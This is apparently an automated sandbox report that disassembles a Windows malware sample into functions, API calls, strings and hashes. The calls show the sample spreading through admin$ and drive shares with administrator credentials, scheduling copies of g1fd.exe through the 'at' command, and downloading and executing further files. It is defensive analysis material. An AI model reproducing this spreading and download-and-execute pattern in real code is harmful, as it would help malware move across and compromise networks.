Function 00402AD0 Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 249
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA,administrator,004095E4,00000000), ref: 00402AEC
GetProcAddress.KERNEL32(00000000), ref: 00402AF5
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00402B04
GetProcAddress.KERNEL32(00000000), ref: 00402B07
LoadLibraryA.KERNELBASE(mpr.dll), ref: 00402B11
GetProcAddress.KERNEL32(00000000,WNetAddConnection2A), ref: 00402B19
memset.MSVCRT ref: 00402B36
lstrcmp.KERNEL32(004030B7,NULL), ref: 00402B46
sprintf.MSVCRT ref: 00402B64

Part of subcall function 00402A92: GetModuleFileNameA.KERNELBASE(00000000,00000000,00000104,00000001), ref: 00402AC1

sprintf.MSVCRT ref: 00402BA6
WNetAddConnection2A.MPR(?,004030B7,?,00000000), ref: 00402BDF
Sleep.KERNELBASE(000000C8), ref: 00402BF5
memset.MSVCRT ref: 00402C09
sprintf.MSVCRT ref: 00402C1D
CopyFileA.KERNEL32(00000000,?,00000000), ref: 00402C3F
memset.MSVCRT ref: 00402C53
sprintf.MSVCRT ref: 00402C67
memset.MSVCRT ref: 00402C9D
sprintf.MSVCRT ref: 00402CB1
memset.MSVCRT ref: 00402CE7
sprintf.MSVCRT ref: 00402CFB
memset.MSVCRT ref: 00402D2D
sprintf.MSVCRT ref: 00402D41
GetLocalTime.KERNEL32(?), ref: 00402D6C
memset.MSVCRT ref: 00402D7B
sprintf.MSVCRT ref: 00402DA2
WinExec.KERNEL32(?,00000000), ref: 00402DAF
Sleep.KERNEL32(000007D0), ref: 00402DC4

Strings

KERNEL32.dll, xrefs: 00402AFC
\\%s\admin$\g1fd.exe, xrefs: 00402C17
lstrcpyA, xrefs: 00402AF7
KERNEL32.dll, xrefs: 00402AE7
\\%s\E$\g1fd.exe, xrefs: 00402CF5
C:\g1fd.exe, xrefs: 00402C72
at \\%s %d:%d %s, xrefs: 00402D9C
E:\g1fd.exe, xrefs: 00402D06
WNetAddConnection2A, xrefs: 00402B13
\\%s\D$\g1fd.exe, xrefs: 00402CAB
\\%s\ipc$, xrefs: 00402BA0
"%s", xrefs: 00402B5E
administrator, xrefs: 00402AE1
\\%s\F$\g1fd.exe, xrefs: 00402D3B
NULL, xrefs: 00402B3E
F:\g1fd.exe, xrefs: 00402D4C
CopyFileA, xrefs: 00402AE2
mpr.dll, xrefs: 00402B09
D:\g1fd.exe, xrefs: 00402CBC
admin$\, xrefs: 00402C28
\\%s\C$\NewArean.exe, xrefs: 00402C61

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: sprintf$memset$AddressLibraryLoadProc$FileSleep$Connection2CopyExecLocalModuleNameTimelstrcmp
String ID: "%s"$C:\g1fd.exe$CopyFileA$D:\g1fd.exe$E:\g1fd.exe$F:\g1fd.exe$KERNEL32.dll$KERNEL32.dll$NULL$WNetAddConnection2A$\\%s\C$\NewArean.exe$\\%s\D$\g1fd.exe$\\%s\E$\g1fd.exe$\\%s\F$\g1fd.exe$\\%s\admin$\g1fd.exe$\\%s\ipc$$admin$\$administrator$at \\%s %d:%d %s$lstrcpyA$mpr.dll
API String ID: 3609035092-2620952620
Opcode ID: c6549ada33351b0c644b47774686d60c5db2e3ebc40509c19cd79e523bc9d003
Instruction ID: e53371337d95753037d5ff201a014897057a964265bdb027f625b62809e70f56
Opcode Fuzzy Hash: c6549ada33351b0c644b47774686d60c5db2e3ebc40509c19cd79e523bc9d003
Instruction Fuzzy Hash: EF810CB1D0065DBACF10ABE5CD89EDE7B7CAF4434AF1004B6F505F2190DA789A848F64

Function 0040597D Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00405992

Part of subcall function 004059F4: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
Part of subcall function 004059F4: GetProcAddress.KERNEL32(00000000), ref: 00405A10
Part of subcall function 004059F4: _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
Part of subcall function 004059F4: _mbscat.MSVCRT ref: 00405AD7
Part of subcall function 004059F4: RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?), ref: 00405AF6

StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 004059BB
ExitProcess.KERNEL32 ref: 004059EE

Strings

Defghijk Mnopqrstu Wxyabcd Fghijklm Opq, xrefs: 004059C7
Defghi Klmnopqr Tuv, xrefs: 004059AC, 004059D1
Defghi Klmnopqr Tuvwxyab Defg, xrefs: 004059CC

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressCtrlDispatcherExitLibraryLoadOpenProcProcessServiceStartStartup_mbscat_mbscpy
String ID: Defghi Klmnopqr Tuv$Defghi Klmnopqr Tuvwxyab Defg$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq
API String ID: 3970724158-1370363722
Opcode ID: d3fd74ce98b53abc42bac9d52cecb53f35e43ddc26a07d1a38ab2e21b0d9893f
Instruction ID: 2c600e66c56aa54e41322d3d423351a33ef688bbf1abba83ec879d044cf264d1
Opcode Fuzzy Hash: d3fd74ce98b53abc42bac9d52cecb53f35e43ddc26a07d1a38ab2e21b0d9893f
Instruction Fuzzy Hash: E8F090B0950209BBDB10BB919C0E7AE76B8EB0430AF40403AE501B00E2DBB85648CF6E

Function 0040407C Relevance: 207.1, APIs: 45, Strings: 73, Instructions: 556
librarystringloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00004650), ref: 0040408D
LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 004040CB
GetProcAddress.KERNEL32(00000000), ref: 004040D4
LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 004040E0
GetProcAddress.KERNEL32(00000000), ref: 004040E3
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004040F2
GetProcAddress.KERNEL32(00000000), ref: 004040F5
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00404104
GetProcAddress.KERNEL32(00000000), ref: 00404107

Part of subcall function 00404044: socket.WS2_32(00000002,00000001,00000000), ref: 0040404E
Part of subcall function 00404044: connect.WS2_32(00000000,?,00000010), ref: 0040405E
Part of subcall function 00404044: closesocket.WS2_32(00000000), ref: 0040406A

Part of subcall function 00403492: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
Part of subcall function 00403492: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD

memset.MSVCRT ref: 00404135

Part of subcall function 00406090: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060AB
Part of subcall function 00406090: LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060C8
Part of subcall function 00406090: GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
Part of subcall function 00406090: memset.MSVCRT ref: 004060F2
Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,2000), ref: 00406283

Part of subcall function 004034E5: wsprintfA.USER32 ref: 004034FC
Part of subcall function 004034E5: LoadLibraryA.KERNELBASE(?), ref: 0040350C

memcpy.MSVCRT(?,?,000000B0), ref: 00404193
send.WS2_32(?,?,00000000), ref: 004041B3
memset.MSVCRT ref: 0040424A
lstrcpyn.KERNEL32(00409328,?,00000080), ref: 004042EB
lstrlen.KERNEL32(00409328,00000200), ref: 004042F7
lstrcpyn.KERNEL32(004093A8,?), ref: 0040430A
lstrcpyn.KERNEL32(004090E0,?,00000080), ref: 0040439B
lstrlen.KERNEL32(004090E0,00000080), ref: 004043A7
lstrcpyn.KERNEL32(00409160,?), ref: 004043BA
lstrcpyn.KERNEL32(004091F8,?,00000104), ref: 004043DA
GetDesktopWindow.USER32 ref: 00404485
ShellExecuteA.SHELL32(00000000), ref: 0040448C
OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 0040449E
ReleaseMutex.KERNEL32(00000000), ref: 004044AB
CloseHandle.KERNEL32(00000000), ref: 004044B2
wsprintfA.USER32 ref: 00404539
LoadLibraryA.KERNEL32(urlmon.dll), ref: 00404557
GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404562
GetTickCount.KERNEL32 ref: 004045C4
wsprintfA.USER32 ref: 004045D7
LoadLibraryA.KERNEL32(urlmon.dll), ref: 004045F5
GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404600
WinExec.KERNEL32(?,00000000), ref: 00404632
OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 0040465B
ReleaseMutex.KERNEL32(00000000), ref: 00404668
CloseHandle.KERNEL32(00000000), ref: 0040466F
memset.MSVCRT ref: 0040468A
sprintf.MSVCRT ref: 0040472B
SHDeleteKeyA.SHLWAPI(80000002,?), ref: 00404740

Part of subcall function 0040355B: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
Part of subcall function 0040355B: GetProcAddress.KERNEL32(00000000), ref: 00403578
Part of subcall function 0040355B: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
Part of subcall function 0040355B: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
Part of subcall function 0040355B: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
Part of subcall function 0040355B: ShellExecuteEx.SHELL32(0000003C), ref: 00403675
Part of subcall function 0040355B: SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
Part of subcall function 0040355B: GetCurrentProcess.KERNEL32(00000100), ref: 00403690
Part of subcall function 0040355B: SetPriorityClass.KERNEL32(00000000), ref: 00403697
Part of subcall function 0040355B: GetCurrentThread.KERNEL32 ref: 0040369B

ExitProcess.KERNEL32 ref: 00404755

Strings

l, xrefs: 004047D6
e, xrefs: 00404443
GetTempPathA, xrefs: 004040D6
WS2_32.dll, xrefs: 004040EA
C, xrefs: 004047BE
kernel32.dll, xrefs: 0040409F
n, xrefs: 004047B6
\, xrefs: 004047E6
p, xrefs: 0040444B
x, xrefs: 00404447
e, xrefs: 004047B2
t, xrefs: 004047BA
s, xrefs: 00404806
i, xrefs: 0040443A
e, xrefs: 004047EE
l, xrefs: 004040C0
v, xrefs: 004047F6
r, xrefs: 004040A8
r, xrefs: 004047F2
p, xrefs: 00404476
r, xrefs: 004047AE
e, xrefs: 0040445B
URLDownloadToFileA, xrefs: 0040455D, 00404560
t, xrefs: 004040B0
o, xrefs: 00404472
t, xrefs: 004047CA
r, xrefs: 004047CE
o, xrefs: 00404453
kernel32.dll, xrefs: 004040DB
u, xrefs: 004047A6
lstrcatA, xrefs: 004040F7
KERNEL32.dll, xrefs: 004040FC
r, xrefs: 004047AA
S, xrefs: 00404786
\, xrefs: 0040479E
x, xrefs: 00404467
e, xrefs: 0040446B
W, xrefs: 004040A4
\, xrefs: 0040480A
Y, xrefs: 0040478A
o, xrefs: 004047C2
E, xrefs: 00404796
t, xrefs: 004047E2
S, xrefs: 0040478E
%s%s, xrefs: 00404780
i, xrefs: 004040BC
i, xrefs: 004047FA
n, xrefs: 004047C6
%s%s, xrefs: 0040469A
S, xrefs: 004047EA
closesocket, xrefs: 004040E5
S, xrefs: 004047DA
urlmon.dll, xrefs: 00404553, 00404556
l, xrefs: 0040444F
e, xrefs: 00404463
w, xrefs: 00404189
e, xrefs: 004040B4
., xrefs: 0040445F
e, xrefs: 004040C4
o, xrefs: 004047D2
e, xrefs: 00404802
n, xrefs: 0040447E
M, xrefs: 0040479A
r, xrefs: 00404457
Defghi Klmnopqr Tuv, xrefs: 00404238, 00404497, 00404654, 00404675, 00404692, 0040475B, 00404778
T, xrefs: 00404792
C, xrefs: 004047A2
c, xrefs: 004047FE
e, xrefs: 0040447A
F, xrefs: 004040B8
%c%c%c%c%ccn.exe, xrefs: 00404533
i, xrefs: 004040AC
e, xrefs: 004047DE

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressProc$lstrcpyn$Mutexmemset$wsprintf$ClassCloseCurrentExecuteHandleNameOpenPriorityProcessReleaseShell_mbscpylstrlen$CountDefaultDeleteDesktopEnvironmentExecExitFileIoctlLanguageModulePathShortSleepSystemThreadTickVariableWindowclosesocketconnectmemcpysendsetsockoptsocketsprintf
String ID: %c%c%c%c%ccn.exe$%s%s$%s%s$.$C$C$Defghi Klmnopqr Tuv$E$F$GetTempPathA$KERNEL32.dll$M$S$S$S$S$T$URLDownloadToFileA$W$WS2_32.dll$Y$\$\$\$c$closesocket$e$e$e$e$e$e$e$e$e$e$e$i$i$i$i$kernel32.dll$kernel32.dll$l$l$l$lstrcatA$n$n$n$o$o$o$o$p$p$r$r$r$r$r$r$s$t$t$t$t$u$urlmon.dll$v$w$x$x
API String ID: 2150264698-2364854850
Opcode ID: 6b4924f4a127d18a0a032bdd380913539c2cdcbc85c7c5ccdd420771a7168c92
Instruction ID: 67642873343b6f7d73ea264a9ba1336f7ce8e91893947de594fae40b13c7bc8e
Opcode Fuzzy Hash: 6b4924f4a127d18a0a032bdd380913539c2cdcbc85c7c5ccdd420771a7168c92
Instruction Fuzzy Hash: 16329771D042C8EEEB11DBA4CD48BDE7FB96B55304F0400A9E144B7292C7BE5A58CB7A

Function 004048AA Relevance: 207.1, APIs: 45, Strings: 73, Instructions: 556
librarystringloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00004650), ref: 004048BB
LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 004048F9
GetProcAddress.KERNEL32(00000000), ref: 00404902
LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 0040490E
GetProcAddress.KERNEL32(00000000), ref: 00404911
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00404920
GetProcAddress.KERNEL32(00000000), ref: 00404923
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00404932
GetProcAddress.KERNEL32(00000000), ref: 00404935

Part of subcall function 0040484F: htons.WS2_32(00001F9A), ref: 00404861
Part of subcall function 0040484F: socket.WS2_32(00000002,00000001,00000000), ref: 0040487F
Part of subcall function 0040484F: connect.WS2_32(00000000,00000002,00000010), ref: 0040488E
Part of subcall function 0040484F: closesocket.WS2_32(00000000), ref: 0040489A

Part of subcall function 00403492: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
Part of subcall function 00403492: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD

memset.MSVCRT ref: 00404963

Part of subcall function 00406090: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060AB
Part of subcall function 00406090: LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060C8
Part of subcall function 00406090: GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
Part of subcall function 00406090: memset.MSVCRT ref: 004060F2
Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,2000), ref: 00406283

Part of subcall function 004034E5: wsprintfA.USER32 ref: 004034FC
Part of subcall function 004034E5: LoadLibraryA.KERNELBASE(?), ref: 0040350C

memcpy.MSVCRT(?,?,000000B0), ref: 004049C1
send.WS2_32(?,?,00000000), ref: 004049E1
memset.MSVCRT ref: 00404A78
lstrcpyn.KERNEL32(00409328,?,00000080), ref: 00404B19
lstrlen.KERNEL32(00409328,00000200), ref: 00404B25
lstrcpyn.KERNEL32(004093A8,?), ref: 00404B38
lstrcpyn.KERNEL32(004090E0,?,00000080), ref: 00404BC9
lstrlen.KERNEL32(004090E0,00000080), ref: 00404BD5
lstrcpyn.KERNEL32(00409160,?), ref: 00404BE8
lstrcpyn.KERNEL32(004091F8,?,00000104), ref: 00404C08
GetDesktopWindow.USER32 ref: 00404CB3
ShellExecuteA.SHELL32(00000000), ref: 00404CBA
OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00404CCC
ReleaseMutex.KERNEL32(00000000), ref: 00404CD9
CloseHandle.KERNEL32(00000000), ref: 00404CE0
wsprintfA.USER32 ref: 00404D67
LoadLibraryA.KERNEL32(urlmon.dll), ref: 00404D85
GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404D90
GetTickCount.KERNEL32 ref: 00404DF2
wsprintfA.USER32 ref: 00404E05
LoadLibraryA.KERNEL32(urlmon.dll), ref: 00404E23
GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404E2E
WinExec.KERNEL32(?,00000000), ref: 00404E60
OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00404E89
ReleaseMutex.KERNEL32(00000000), ref: 00404E96
CloseHandle.KERNEL32(00000000), ref: 00404E9D
memset.MSVCRT ref: 00404EB8
sprintf.MSVCRT ref: 00404F59
SHDeleteKeyA.SHLWAPI(80000002,?), ref: 00404F6E

Part of subcall function 0040355B: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
Part of subcall function 0040355B: GetProcAddress.KERNEL32(00000000), ref: 00403578
Part of subcall function 0040355B: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
Part of subcall function 0040355B: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
Part of subcall function 0040355B: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
Part of subcall function 0040355B: ShellExecuteEx.SHELL32(0000003C), ref: 00403675
Part of subcall function 0040355B: SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
Part of subcall function 0040355B: GetCurrentProcess.KERNEL32(00000100), ref: 00403690
Part of subcall function 0040355B: SetPriorityClass.KERNEL32(00000000), ref: 00403697
Part of subcall function 0040355B: GetCurrentThread.KERNEL32 ref: 0040369B

ExitProcess.KERNEL32 ref: 00404F83

Strings

r, xrefs: 00404FD8
e, xrefs: 00404C89
C, xrefs: 00404FD0
e, xrefs: 00404C99
n, xrefs: 00404CAC
t, xrefs: 004048DE
WS2_32.dll, xrefs: 00404918
e, xrefs: 004048F2
r, xrefs: 004048D6
p, xrefs: 00404CA4
n, xrefs: 00404FE4
i, xrefs: 004048DA
r, xrefs: 00404FDC
M, xrefs: 00404FC8
c, xrefs: 0040502C
t, xrefs: 00405010
v, xrefs: 00405024
URLDownloadToFileA, xrefs: 00404D8B, 00404D8E
%s%s, xrefs: 00404FAE
t, xrefs: 00404FF8
e, xrefs: 00404C91
o, xrefs: 00405000
e, xrefs: 00404FE0
l, xrefs: 00405004
lstrcatA, xrefs: 00404925
i, xrefs: 00404C68
S, xrefs: 00404FB4
n, xrefs: 00404FF4
kernel32.dll, xrefs: 004048CD
e, xrefs: 0040501C
x, xrefs: 00404C75
C, xrefs: 00404FEC
i, xrefs: 00405028
%s%s, xrefs: 00404EC8
r, xrefs: 00404C85
r, xrefs: 00405020
e, xrefs: 004048E2
%c%c%c%c%ccn.exe, xrefs: 00404D61
W, xrefs: 004048D2
x, xrefs: 00404C95
p, xrefs: 00404C79
F, xrefs: 004048E6
t, xrefs: 00404FE8
S, xrefs: 00404FBC
s, xrefs: 00405034
GetTempPathA, xrefs: 00404904
\, xrefs: 00405014
., xrefs: 00404C8D
e, xrefs: 00404C71
kernel32.dll, xrefs: 00404909
E, xrefs: 00404FC4
i, xrefs: 004048EA
e, xrefs: 0040500C
KERNEL32.dll, xrefs: 0040492A
u, xrefs: 00404FD4
S, xrefs: 00405008
r, xrefs: 00404FFC
closesocket, xrefs: 00404913
e, xrefs: 00405030
Y, xrefs: 00404FB8
l, xrefs: 00404C7D
o, xrefs: 00404CA0
\, xrefs: 00405038
S, xrefs: 00405018
o, xrefs: 00404FF0
e, xrefs: 00404CA8
Defghi Klmnopqr Tuv, xrefs: 00404A66, 00404CC5, 00404E82, 00404EA3, 00404EC0, 00404F89, 00404FA6
l, xrefs: 004048EE
urlmon.dll, xrefs: 00404D81, 00404D84
T, xrefs: 00404FC0
o, xrefs: 00404C81
w, xrefs: 004049B7
\, xrefs: 00404FCC

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressProc$lstrcpyn$Mutexmemset$wsprintf$ClassCloseCurrentExecuteHandleNameOpenPriorityProcessReleaseShell_mbscpylstrlen$CountDefaultDeleteDesktopEnvironmentExecExitFileIoctlLanguageModulePathShortSleepSystemThreadTickVariableWindowclosesocketconnecthtonsmemcpysendsetsockoptsocketsprintf
String ID: %c%c%c%c%ccn.exe$%s%s$%s%s$.$C$C$Defghi Klmnopqr Tuv$E$F$GetTempPathA$KERNEL32.dll$M$S$S$S$S$T$URLDownloadToFileA$W$WS2_32.dll$Y$\$\$\$c$closesocket$e$e$e$e$e$e$e$e$e$e$e$i$i$i$i$kernel32.dll$kernel32.dll$l$l$l$lstrcatA$n$n$n$o$o$o$o$p$p$r$r$r$r$r$r$s$t$t$t$t$u$urlmon.dll$v$w$x$x
API String ID: 2152970890-2364854850
Opcode ID: 4f0d886bb70089ebf16781ed20cfd5bc5b80506e33529b3b2d0c9907bdf4c32f
Instruction ID: 34a9ccf79dfd8e924b7e3463a5d7c06d8bd6e6ee9c35ded2589a275d78ef8857
Opcode Fuzzy Hash: 4f0d886bb70089ebf16781ed20cfd5bc5b80506e33529b3b2d0c9907bdf4c32f
Instruction Fuzzy Hash: 4B32A771D042C8EEEB11DBA4CD48BDEBFB96B55304F0400A9E144B7292C7BE5A58CB79

Function 0040387C Relevance: 205.3, APIs: 44, Strings: 73, Instructions: 554
librarystringloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 004038C0
GetProcAddress.KERNEL32(00000000), ref: 004038C9
LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 004038D5
GetProcAddress.KERNEL32(00000000), ref: 004038D8
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004038E7
GetProcAddress.KERNEL32(00000000), ref: 004038EA
LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 004038F9
GetProcAddress.KERNEL32(00000000), ref: 004038FC

Part of subcall function 0040336C: LoadLibraryA.KERNEL32(WS2_32.dll,htons,76F8F550,76F90BD0,00000000), ref: 00403389
Part of subcall function 0040336C: GetProcAddress.KERNEL32(00000000), ref: 00403392
Part of subcall function 0040336C: LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 0040339D
Part of subcall function 0040336C: GetProcAddress.KERNEL32(00000000), ref: 004033A0
Part of subcall function 0040336C: _mbscpy.MSVCRT(?,00000000,EhETHRcLHRAXHREQEAkLEwsTQw==), ref: 004033CF
Part of subcall function 0040336C: strstr.MSVCRT ref: 004033E0
Part of subcall function 0040336C: memset.MSVCRT ref: 004033F9
Part of subcall function 0040336C: strcspn.MSVCRT ref: 00403410
Part of subcall function 0040336C: strncpy.MSVCRT ref: 0040341B
Part of subcall function 0040336C: strcspn.MSVCRT ref: 0040342D
Part of subcall function 0040336C: atoi.MSVCRT(?), ref: 00403437
Part of subcall function 0040336C: socket.WS2_32(00000002,00000001,00000000), ref: 00403468
Part of subcall function 0040336C: connect.WS2_32(00000000,00000002,00000010), ref: 00403477

Part of subcall function 00403492: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
Part of subcall function 00403492: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD

memset.MSVCRT ref: 0040392A

Part of subcall function 00406090: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060AB
Part of subcall function 00406090: LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060C8
Part of subcall function 00406090: GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
Part of subcall function 00406090: memset.MSVCRT ref: 004060F2
Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,2000), ref: 00406283

Part of subcall function 004034E5: wsprintfA.USER32 ref: 004034FC
Part of subcall function 004034E5: LoadLibraryA.KERNELBASE(?), ref: 0040350C

memcpy.MSVCRT(?,?,000000B0), ref: 00403988
send.WS2_32(?,?,00000000), ref: 004039A8
memset.MSVCRT ref: 00403A3F
lstrcpyn.KERNEL32(00409328,?,00000080), ref: 00403AE0
lstrlen.KERNEL32(00409328,00000200), ref: 00403AEC
lstrcpyn.KERNEL32(004093A8,?), ref: 00403AFF
lstrcpyn.KERNEL32(004090E0,?,00000080), ref: 00403B90
lstrlen.KERNEL32(004090E0,00000080), ref: 00403B9C
lstrcpyn.KERNEL32(00409160,?), ref: 00403BAF
lstrcpyn.KERNEL32(004091F8,?,00000104), ref: 00403BCF
GetDesktopWindow.USER32 ref: 00403C7A
ShellExecuteA.SHELL32(00000000), ref: 00403C81
OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00403C93
ReleaseMutex.KERNEL32(00000000), ref: 00403CA0
CloseHandle.KERNEL32(00000000), ref: 00403CA7
wsprintfA.USER32 ref: 00403D2E
LoadLibraryA.KERNEL32(urlmon.dll), ref: 00403D4C
GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00403D57
GetTickCount.KERNEL32 ref: 00403DB9
wsprintfA.USER32 ref: 00403DCC
LoadLibraryA.KERNEL32(urlmon.dll), ref: 00403DEA
GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00403DF5
WinExec.KERNEL32(?,00000000), ref: 00403E27
OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00403E50
ReleaseMutex.KERNEL32(00000000), ref: 00403E5D
CloseHandle.KERNEL32(00000000), ref: 00403E64
memset.MSVCRT ref: 00403E7F
sprintf.MSVCRT ref: 00403F20
SHDeleteKeyA.SHLWAPI(80000002,?), ref: 00403F35

Part of subcall function 0040355B: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
Part of subcall function 0040355B: GetProcAddress.KERNEL32(00000000), ref: 00403578
Part of subcall function 0040355B: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
Part of subcall function 0040355B: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
